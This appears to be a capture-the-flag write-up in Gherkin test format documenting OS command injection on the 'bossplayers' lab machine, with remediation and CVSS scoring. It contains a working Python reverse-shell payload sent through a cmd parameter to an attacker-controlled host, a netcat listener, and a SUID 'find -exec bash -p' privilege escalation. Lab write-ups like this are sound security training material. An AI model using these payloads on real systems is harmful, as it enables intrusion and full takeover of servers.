## Version 1.4.1
## language: en

Feature:
  TOE:
    bossplayers
  Category:
    OS Command Injection
  Location:
    http://192.168.0.4:80/
  CWE:
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
  Rule:
    Rule.173 Discard unsafe inputs
  Goal:
    Execute commands from the web server
  Recommendation:
    Sanitize every input

  Background:
  Hacker Software:
    | <Software name>   | <Version> |
    | Kali Linux        |  2020.3   |
    | Nmap              |  7.80     |
    | VirtualBox        |  6.1      |
    | Firefox           |  79.0     |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 13:34 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0051s latency).
    Nmap scan report for bossplayers (192.168.0.4)
    Host is up (0.0058s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 6.55 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.4
    """
    $ sudo nmap -sV -sS 192.168.0.11
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 13:37 EST
    Nmap scan report for bossplayers (192.168.0.4)
    Host is up (0.0011s latency).
    Not shown: 998 filtered ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 12.59 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.4:80/
    And the bossplayers CTF homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the web browser inspection tool
    Then I find a base64 encoded comment [evidences](03.png)
    """
    WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
    """
    Given the comment I use the base64 decoder online [evidences](04.png)
    """
    https://www.base64decode.org/

    WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
    ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K
    d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==
    workinginprogress.php
    """
    Given the decoding, a route is obtained as a result
    Then I access through the web browser [evidences](05.png)
    Then I send a GET request with the cmd=ls parameter [evidences](06.png)
    Then is then inferred that may be vulnerable by Command Injection

  Scenario: Exploitation
    Given the site is vulnerable to Command Injection
    Then the idea is to take advantage of vulnerability as a first validation
    Then I use the command injection vulnerability for taking the shell access
    And I send the payload as a GET request parameter through the URL
    """
    http://192.168.1.24/workinginprogress.php?
    cmd=python%20-c%20%27import%20socket,subprocess,
    os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
    s.connect((%22192.168.0.9%22,1234));os.dup2(s.fileno(),0);
    %20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);
    p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
    """
    Then I configure the attacking machine to listen connections
    """
    nc -lvp 1234
    listening on [any] 1234 ...
    192.168.0.5: inverse host lookup failed: Host name lookup failure
    connect to [192.168.0.9] from (UNKNOWN) [192.168.0.5] 43518
    /bin/sh: 0: can't access tty; job control turned off
    $
    """
    Then I list the available commands without being root user
    """
    $ find / -perm -4000 -type f 2>/dev/null

    /usr/bin/mount
    /usr/bin/umount
    /usr/bin/gpasswd
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/grep
    /usr/bin/chfn
    /usr/bin/passwd
    /usr/bin/find
    /usr/bin/newgrp
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/lib/eject/dmcrypt-get-device
    """
    Given the results I observe the command "/usr/bin/find"
    Then I executed the command and find the flag
    """
    /usr/bin/find -exec bash -p \;
    cd /root
    ls
    root.txt
    cat root.txt
    Y29uZ3JhdHVsYXRpb25zCg==
    """
    Then I find a base64 encoded flag
    Given the flag I use the base64 decoder online [evidences](07.png)
    """
    https://www.base64decode.org/

    Y29uZ3JhdHVsYXRpb25zCg==
    congratulations
    """
    Then I cant read the flag

  Scenario: Remediation
    Given The site is susceptible to Command Injection
    Then filter content of special characters in shell syntax

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.3/10 (high) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    7/10 (high) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.6/10 (medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:L/MA:L

  Scenario: Correlations
    No correlations have been found to this date 2020-12-10
